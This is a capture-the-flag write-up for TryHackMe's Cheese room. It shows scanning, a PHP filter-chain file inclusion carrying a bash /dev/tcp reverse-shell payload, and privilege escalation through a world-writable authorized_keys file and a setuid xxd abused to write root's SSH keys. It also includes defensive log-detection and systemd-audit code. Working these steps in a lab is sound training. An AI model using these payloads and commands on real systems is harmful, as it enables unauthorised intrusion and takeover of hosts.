TryHackMe: Cheese CTF
The Cheese CTF was a great room with new things for me to learn, yet I'm still relying too much on write-ups. The problem is I don't really feel stuck, because right after looking at write-ups I understand what to do and feel more motivated... my mind tricks me into thinking I'm stuck. Working on it though: in every room now I have a file where I point out what I'm doing wrong, and after completing the rooms I'll go and try to fix the issues from before on the next one, and so on. Overall I'm loving cybersecurity, it's just that I get kinda lost when doing things.
https://tryhackme.com/r/room/cheesectfv10
Initial Enumeration
Nmap Scan
A default nmap scan doesn't tell us much, because the target spoofs open ports, but if we limit the scan to the top 50 ports we can still pick out some useful content:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 10.10.1.113 --top-ports 50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 10:23 GMT
Nmap scan report for 10.10.1.113
Host is up (0.056s latency).
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
26/tcp    open  rsftp
53/tcp    open  domain
80/tcp    open  http
81/tcp    open  hosts2-ns
110/tcp   open  pop3
111/tcp   open  rpcbind
113/tcp   open  ident
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
179/tcp   open  bgp
199/tcp   open  smux
443/tcp   open  https
445/tcp   open  microsoft-ds
465/tcp   open  smtps
514/tcp   open  shell
515/tcp   open  printer
548/tcp   open  afp
554/tcp   open  rtsp
587/tcp   open  submission
646/tcp   open  ldp
993/tcp   open  imaps
995/tcp   open  pop3s
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1433/tcp  open  ms-sql-s
1720/tcp  open  h323q931
1723/tcp  open  pptp
2000/tcp  open  cisco-sccp
2001/tcp  open  dc
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
5060/tcp  open  sip
5666/tcp  open  nrpe
5900/tcp  open  vnc
6001/tcp  open  X11:1
8000/tcp  open  http-alt
8008/tcp  open  http
8080/tcp  open  http-proxy
8443/tcp  open  https-alt
8888/tcp  open  sun-answerbook
10000/tcp open  snet-sensor-mgmt
32768/tcp open  filenet-tms
49152/tcp open  unknown
49154/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds
```
Web 80
While checking the top ports we find a website on port 80:
Gobuster Scan
Not much to see, an index file and a login page, so we do a simple gobuster scan:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.1.113:80/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.1.113:80/
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1759]
/login.php            (Status: 200) [Size: 834]
/users.html           (Status: 200) [Size: 377]
/images               (Status: 301) [Size: 315] [--> http://10.10.1.113/images/]
/messages.html        (Status: 200) [Size: 448]
/orders.html          (Status: 200) [Size: 380]
/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
```
We see 3 interesting pages:
- messages.html
- orders.html
- users.html
users.html and orders.html were empty, but messages.html had a link:
When pressed, the link sends us to the following url:
```
http://10.10.1.113/secret-script.php?file=php://filter/resource=supersecretmessageforadmin
```
Reverse Shell
If we make the filter base64-encode its output, we can retrieve the content of the secret-script.php file itself and see what we are working with:
Now we use CyberChef to decode the text:
We see that it's using include, so now we could look for a way to get a reverse shell through the file parameter. Doing a quick search we find the following repository:
It contains a file called php_filter_chain_generator.py that we will use to generate a filter chain to run a reverse shell:
```
┌──(venv)─(kali㉿kali)-[~/Desktop]
└─$ python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/[REDACTED]/4444 0>&1\"')?>" | grep "^php" > reverse_shell.txt
```
To send the file we will use curl, but first we need a listener on port 4444:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
```
After that we can send the payload:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ curl "http://10.10.1.113/secret-script.php?file=$(cat reverse_shell.txt)"
```
And we are in:
```
connect to [REDACTED] from (UNKNOWN) [10.10.1.113] 37868
bash: cannot set terminal process group (852): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cheesectf:/var/www/html$
```
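From the defender's side, the requests above leave a clear trace in the web server's access log: a `file` parameter carrying a `php://` wrapper, and later a long `convert.iconv`/`convert.base64` filter chain. The following detector is an added example, not code from the original write-up; the log lines it scans are constructed samples in Apache combined format, and the chain fragment in the third line is a harmless placeholder, not a working payload.

```python
"""Detection helper, added as an example; it is not code from the original
write-up. It flags requests whose query parameters carry a PHP stream wrapper
or a php://filter chain, the pattern sent to secret-script.php above.
The access-log lines are constructed samples in Apache combined format."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed samples: a benign page view, the plain filter read from the
# write-up, and a URL-encoded chain using convert.iconv/convert.base64 filters.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2025:10:30:01 +0000] "GET /messages.html HTTP/1.1" 200 448 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Jan/2025:10:31:12 +0000] "GET /secret-script.php?file=php://filter/resource=supersecretmessageforadmin HTTP/1.1" 200 512 "-" "curl/8.5"
10.0.0.5 - - [27/Jan/2025:10:32:40 +0000] "GET /secret-script.php?file=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.UTF16%7Cconvert.base64-encode%2Fresource%3Dphp%3A%2F%2Ftemp HTTP/1.1" 200 91 "-" "curl/8.5"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Wrappers that make include()/require() read something other than a plain local path.
WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|zip|glob)://", re.IGNORECASE)


def classify(target: str) -> list[str]:
    """Return the reasons a request target looks like wrapper or filter abuse."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decodes once; catch double-encoded values too
        if WRAPPER_RE.match(value):
            reasons.append(f"{name}: stream wrapper")
        if "convert.iconv." in value or "convert.base64-" in value:
            reasons.append(f"{name}: filter chain")
    return reasons


def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Parse each log line and keep (client ip, target, reasons) for suspicious ones."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

The same check applied before `include` (rejecting any value that is not a plain allow-listed file name) is what would have closed the hole in secret-script.php.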
When enumerating we find a user home directory called comte which has the user.txt file, but we don't have permission to open it. We also find the .ssh directory, which is readable and has the authorized_keys file inside:
```
www-data@cheesectf:/home/comte$ ls -alh
total 44K
drwxr-xr-x 4 comte comte 4.0K Sep 28 03:42 .
drwxr-xr-x 3 root  root  4.0K Sep 27 17:04 ..
-rw------- 1 comte comte   55 Sep 28 03:39 .Xauthority
-rw------- 1 comte comte   19 Sep 28 03:42 .bash_history
-rw-r--r-- 1 comte comte  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 comte comte 3.7K Feb 25  2020 .bashrc
drwx------ 2 comte comte 4.0K Sep 27 17:05 .cache
-rw-r--r-- 1 comte comte  807 Feb 25  2020 .profile
drwxr-xr-x 2 comte comte 4.0K Sep 27 17:04 .ssh
-rw-r--r-- 1 comte comte    0 Sep 27 17:06 .sudo_as_admin_successful
-rw------- 1 comte comte 4.2K Sep 15 07:45 user.txt
www-data@cheesectf:/home/comte$
```
```
www-data@cheesectf:/home/comte/.ssh$ ls -alh
drwxr-xr-x 2 comte comte 4.0K Sep 27 17:04 .
drwxr-xr-x 4 comte comte 4.0K Sep 28 03:42 ..
-rw-rw-rw- 1 comte comte    0 Sep 27 17:04 authorized_keys
```
SSH with authorized_keys
comte
We could now generate a key of our own and put it inside authorized_keys, since the file is world-writable and we have the permissions to do so. (Note that sshd's StrictModes option, which is on by default, refuses an authorized_keys file that is writable by others, so this only works where that check has been turned off.)
The first step is generating a key with the ssh-keygen command:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase for "id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in yes
Your public key has been saved in id_rsa.pub
...
```
Two files are created:
- id_rsa
- id_rsa.pub
To be able to access comte we will read the content of the .pub file, copy it, and put it inside authorized_keys:
```
www-data@cheesectf:/home/comte/.ssh$ echo 'ssh-rsa <PUBLIC_KEY_OMITTED> kali@kali' > authorized_keys
```
Now that our key is inside we are able to log into comte through ssh from our machine and read the user.txt file:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa comte@10.10.1.113
...
comte@cheesectf:~$ ls
snap  user.txt
comte@cheesectf:~$ cat user.txt
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⠀⠉⠛⠻⢶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠟⠁⣠⣴⣶⣶⣤⡀⠈⠉⠛⠿⢶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡿⠃⠀⢰⣿⠁⠀⠀⢹⡷⠀⠀⠀⠀⠀⠈⠙⠻⠷⣶⣤⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠋⠀⠀⠀⠈⠻⠷⠶⠾⠟⠁⠀⠀⣀⣀⡀⠀⠀⠀⠀⠀⠉⠛⠻⢶⣦⣄⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠁⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⣼⠟⠛⢿⡆⠀⠀⠀⠀⠀⣀⣤⣶⡿⠟⢿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠋⠀⠀⣴⡿⠛⠛⠛⠛⣿⡄⠀⠀⠀⠀⠻⣶⣶⣾⠇⢀⣀⣤⣶⠿⠛⠉⠀⠀⠀⢸⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠟⠀⠀⠀⠀⢿⣦⡀⠀⠀⠀⣹⡇⠀⠀⠀⠀⠀⣀⣤⣶⡾⠟⠋⠁⠀⠀⠀⠀⠀⣠⣴⠾⠇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠙⠻⠿⠶⠾⠟⠁⢀⣀⣤⡶⠿⠛⠉⠀⣠⣶⠿⠟⠿⣶⡄⠀⠀⣿⡇⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⠟⢁⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⠾⠟⠋⠁⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⣼⡇⠀⠀⠙⢷⣤⡀
⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⣾⡏⢻⣷⠀⠀⠀⢀⣠⣴⡶⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣷⣤⣤⣴⡟⠀⠀⠀⠀⠀⢻⡇
⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⠀⠀⠙⠛⢛⣋⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠁⠀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⠀⠀⣠⣾⠟⠁⠀⢀⣀⣤⣤⡶⠾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣤⣤⣤⡀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⣠⣾⣿⣥⣶⠾⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠶⣶⣤⣀⠀⠀⠀⠀⠀⢠⡿⠋⠁⠀⠀⠀⠈⠉⢻⣆⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠛⠉⠁⠀⢀⣠⣴⣶⣦⣀⠀⠀⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠀⠉⠻⣷⡀⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠘⣿⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠀⠀⠀⣴⡟⠋⠀⠀⠈⢻⣦⠀⠀⠀⠀⠀⢰⣿⠁⠀⠀⠀⠀⠀⠀⢸⣷⠀⠀⠀⢻⣧⠀⠀⠀⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⢿⡆⠀⠀⠀⠀⢰⣿⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠙⢿⣦⣄⣀⣀⣠⣤⡾⠋⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⠘⣿⣄⣀⣠⣴⡿⠁⠀⠀⠀⠀⠀⠀⢿⣆⠀⠀⠀⢀⣠⣾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠀⠀⠀⣀⣤⣴⠿⠃
⠀⠸⣷⡄⠀⠀⠀⠈⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠿⠿⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⡶⠟⠋⠉⠀⠀⠀
⠀⠀⠈⢿⣆⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣶⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢨⣿⠀⠀⠀⠀⠀⠀⣼⡟⠁⠀⠀⠀⠹⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣠⡾⠋⠀⠀⠀⠀⠀⠀⢻⣇⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⢠⣾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣤⣤⣤⣴⡿⠃⠀⠀⣀⣤⣶⠾⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⣀⣠⣴⡾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⡇⠀⠀⠀⠀⣀⣤⣴⠾⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⣧⣤⣴⠾⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠘⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
THM{REDACTED}
comte@cheesectf:~$
```
While enumerating, when doing sudo -l, we find a weird service called exploit.timer:
```
comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
```
Navigating to the /etc/systemd/system folder we find two files:
- exploit.service
- exploit.timer
Reading the two we see that exploit.timer doesn't do much:
```
comte@cheesectf:~$ cat /etc/systemd/system/exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=

[Install]
WantedBy=timers.target
```
And exploit.service copies the xxd binary to /opt and adds SUID permissions:
```
comte@cheesectf:~$ cat /etc/systemd/system/exploit.service
[Unit]
Description=Exploit Service

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
```
When trying to start the service it gives an error:
```
comte@cheesectf:~$ sudo /bin/systemctl start exploit.timer
Failed to start exploit.timer: Unit exploit.timer has a bad unit file setting.
See system logs and 'systemctl status exploit.timer' for details.
```
To fix this issue we just have to give OnBootSec= a value in the [Timer] section of exploit.timer:
```
comte@cheesectf:~$ nano /etc/systemd/system/exploit.timer
comte@cheesectf:~$ cat /etc/systemd/system/exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=0

[Install]
WantedBy=timers.target
```
Now we can start the service with no problems:
```
comte@cheesectf:~$ sudo /bin/systemctl daemon-reload
comte@cheesectf:~$ sudo /bin/systemctl start exploit.timer
comte@cheesectf:~$ systemctl status exploit.timer
● exploit.timer - Exploit Timer
     Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
     Active: active (elapsed) since Wed 2024-09-25 02:41:41 UTC; 4s ago
    Trigger: n/a
   Triggers: ● exploit.service
comte@cheesectf:~$ ls -la /opt
total 28
drwxr-xr-x  2 root root  4096 Sep 25 02:41 .
drwxr-xr-x 19 root root  4096 Sep 27  2023 ..
-rwsr-sr-x  1 root root 18712 Sep 25 02:41 xxd
```
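What made this step possible is not the timer itself but the combination: a unit file comte could edit, sudo rules that let comte start that unit, and an ExecStart that hands out setuid bits. The audit below is an added example, not code from the original write-up; it recreates the sudo output and the two unit files shown above in a temporary directory (mode 666 is an assumption, standing in for whatever made `nano` on the timer succeed) and reports each unit that hits one of those conditions.

```python
"""Audit helper added as an example (not from the original write-up). It flags what
was abused here: a unit file the user can edit, sudo rules that let the user start
it, and an ExecStart that hands out setuid bits. Inputs mirror the ones shown above."""
import re
import tempfile
from pathlib import Path

SUDO_L = """User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
"""
TIMER = "[Unit]\nDescription=Exploit Timer\n[Timer]\nOnBootSec=\n[Install]\nWantedBy=timers.target\n"
SERVICE = ("[Unit]\nDescription=Exploit Service\n[Service]\nType=oneshot\n"
           'ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"\n')
SETUID_RE = re.compile(r"chmod\s+(?:[ugoa]*\+\w*s|[2-7][0-7]{3})")  # "+s" or numeric setuid/setgid


def sudo_startable(sudo_output: str) -> set[str]:
    """Units the user may start via sudo; a timer also implies its same-named .service."""
    units = set()
    for m in re.finditer(r"systemctl\s+(?:start|restart|enable)\s+(\S+)", sudo_output):
        units.add(m.group(1))
        if m.group(1).endswith(".timer"):
            units.add(m.group(1)[: -len(".timer")] + ".service")
    return units


def audit(unit_dir: str, startable: set[str]) -> dict[str, list[str]]:
    """Return {unit name: findings} for every unit file with at least one finding."""
    findings = {}
    for path in sorted(Path(unit_dir).iterdir()):
        issues = []
        if path.stat().st_mode & 0o022:  # group- or world-writable
            issues.append("writable by non-owner")
        if SETUID_RE.search(path.read_text()):
            issues.append("ExecStart grants setuid/setgid")
        if path.name in startable:
            issues.append("startable via sudo")
        if issues:
            findings[path.name] = issues
    return findings


def demo() -> dict[str, list[str]]:
    """Recreate the two units in a temp dir (mode 666, assumed editable by comte) and audit."""
    unit_dir = tempfile.mkdtemp()
    for name, body in (("exploit.timer", TIMER), ("exploit.service", SERVICE)):
        unit = Path(unit_dir, name)
        unit.write_text(body)
        unit.chmod(0o666)
    return audit(unit_dir, sudo_startable(SUDO_L))
```

Pointing `audit` at a real /etc/systemd/system with the output of `sudo -l` turns this into a quick check for the same misconfiguration on other hosts.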
root
Looking at GTFOBins we find an entry for the xxd binary with a file-write option; since the copy in /opt is now SUID root, we can use it to write our public key into root's authorized_keys and log in with the same method as before:
```
LFILE=file_to_write
echo DATA | xxd | xxd -r - "$LFILE"
```
Since we already have an id_rsa key pair, we just have to send its public key to root's authorized_keys file:
```
comte@cheesectf:~$ echo 'ssh-rsa <PUBLIC_KEY_OMITTED> kali@kali' | xxd | /opt/xxd -r - /root/.ssh/authorized_keys
```
We can now log into root the same way as before and read the root.txt file:
```
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_ed25519 root@10.10.1.113
...
root@cheesectf:~# ls
root.txt  snap
root@cheesectf:~# cat root.txt
 _ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|
THM{REDACTED}
root@cheesectf:~#
```